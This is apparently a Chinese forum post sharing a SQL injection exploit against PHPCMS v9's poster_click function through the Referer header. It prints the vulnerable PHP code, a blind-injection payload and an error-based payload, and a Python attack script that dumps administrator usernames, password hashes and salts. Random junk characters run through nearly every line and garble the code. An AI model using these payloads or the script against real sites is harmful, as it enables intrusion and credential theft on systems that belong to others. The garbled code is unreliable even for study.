有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
. d7 b# e+ T, b1 s% i2 W7 f2 W/ F5 i) Z* L+ L3 ]
问题函数\phpcms\modules\poster\index.php8 x" a( O) C% N T' [' m
$ y8 Y* M2 |, d6 x" y
public function poster_click() {
9 E! e- J7 J- J% M' U+ i, N$id = isset($_GET['id']) ? intval($_GET['id']) : 0;6 u" n- g# ~5 k( M( U- A
$r = $this->db->get_one(array('id'=>$id));+ B' @9 }) J) ?3 a/ e u# h
if (!is_array($r) && empty($r)) return false;
% d' n' L/ s( \+ F* }$ip_area = pc_base::load_sys_class('ip_area');
( f# x) {% E3 A5 O" f" ~# z$ip = ip();
N5 R8 P4 h8 M" l2 F9 t* d% t$area = $ip_area->get($ip);- m8 ]' _7 |8 b- c9 H8 O2 E
$username = param::get_cookie('username') ? param::get_cookie('username') : '';* Y- u' Q. {8 B# r4 w
if($id) {0 a' P" X/ o- }3 b( M
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();; w% Z0 g+ d( Q2 B" H+ `/ Z
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
, s l9 W* u, x}
0 `' X! \2 w4 j' f! ]& G7 V9 m$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
: M' y" S2 v; w0 X2 W$setting = string2array($r['setting']);) T$ D$ Q, l J2 A; r, s" z- R
if (count($setting)==1) {
1 |$ M9 M' R1 M# j, i* P3 E$ o$url = $setting['1']['linkurl'];
( J$ s/ {. n8 O- p* N} else {
* l6 _4 _2 r% e4 {8 e8 o6 @0 C( Q$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
' t, f4 b2 H) l( E}
0 }; Q( g, T2 O5 {header('Location: '.$url);
1 J: d' L* V$ }+ }8 f, H}
- o; o5 J2 |, Y# l) [
% B C4 d D4 R' F8 @ ?# y6 A* n1 f7 o# _2 `
( [& R* y9 N" r+ e( {& B1 a利用方式:8 B0 a' U9 N9 f
( Z5 i- ?7 [/ l, j1、可以采用盲注入的手法:
9 \ e+ a$ |8 }' B; P5 d
' }4 j8 P6 n/ F" Q4 t) G! e9 c/ F% Kreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
5 N6 s& N; c3 C9 a' b2 t: `2 ~! i1 {( {7 A2 ?
通过返回页面,正常与否一个个猜解密码字段。" V- x* ]0 f) r- O1 z
0 t( r1 \" o5 n6 n( p+ v: f2、代码是花开写的,随手附上了:
: {& k: o9 x T( z2 F7 l% N7 F" p
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
; i" ^) F% k: r1 I* A; H' S1 K1 j# T6 w: U" g9 N
此方法是爆错注入手法,原理自查。: F' d# ]0 l4 c" L. D: k9 v. [
7 f/ b% K! l$ U: v' }* ^
" y8 A: Q! q- Z9 j6 S- F/ _, C
+ @9 ?5 ^ g# S2 N利用程序:
0 a+ z, U2 V+ n6 ], ^
8 x9 t2 y: W- p: q#!/usr/bin/env python& r! ]+ _& H K! S& b+ k
import httplib,sys,re
& y4 t; H! O$ T r
8 @+ h% ~/ ^, j/ `( Hdef attack():% o2 o/ k' B! \" \! H+ K0 L
print “Code by Pax.Mac Team conqu3r!”' \0 K r4 P+ Z6 z$ T
print “Welcome to our zone!!!”
( q7 a" Q/ K( ], W$ L: m) f* aurl=sys.argv[1]
6 H, Z- C# h2 R; lpaths=sys.argv[2]- F6 u+ e% D- c5 p& i
conn = httplib.HTTPConnection(url)
+ y5 M3 t( ~* {8 D: M) [i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
! O$ S& d4 x& M0 c- i“Accept”: “text/plain”,
|; C; s- x( s; E; w1 p0 f“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
! Z2 }6 A( i2 o; R+ i: y _+ uconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)/ c! z1 j2 o& y! I! E* V- w
r1 = conn.getresponse()* o6 C$ A9 r Y" d u9 s3 g& R9 E
datas=r1.read()! V9 b6 ?" t S1 t- ~
datas=re.findall(r”Duplicate entry \’\w+’”, datas)6 E5 x( _9 O" [& C f" O( L4 o
print datas[0]9 y% T% ?1 a2 k' Q
conn.close(), Y: ]- q$ [! M
if __name__==”__main__”: @4 S' M4 i- `$ \" S
if len(sys.argv)<3:5 \5 M4 n8 X+ F6 |; G- z
print “Code by Pax.Mac Team conqu3r”
8 y6 m' R) p+ }7 Xprint “Usgae:”
+ `* Y9 n) B% J2 |6 rprint “ phpcmsattack.py www.paxmac.org /”% q7 @' `8 ~% ~. R1 Q& ]
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”7 x1 y; i# s4 l% e
sys.exit(1)
$ ]5 {/ ]1 N. o- l4 a V7 { rattack()
# M3 J( F4 k" k2 m% k1 v9 Q' p9 s* H& m3 ~, [
|
发表于 2013-1-11 21:01:00
收藏
支持
反对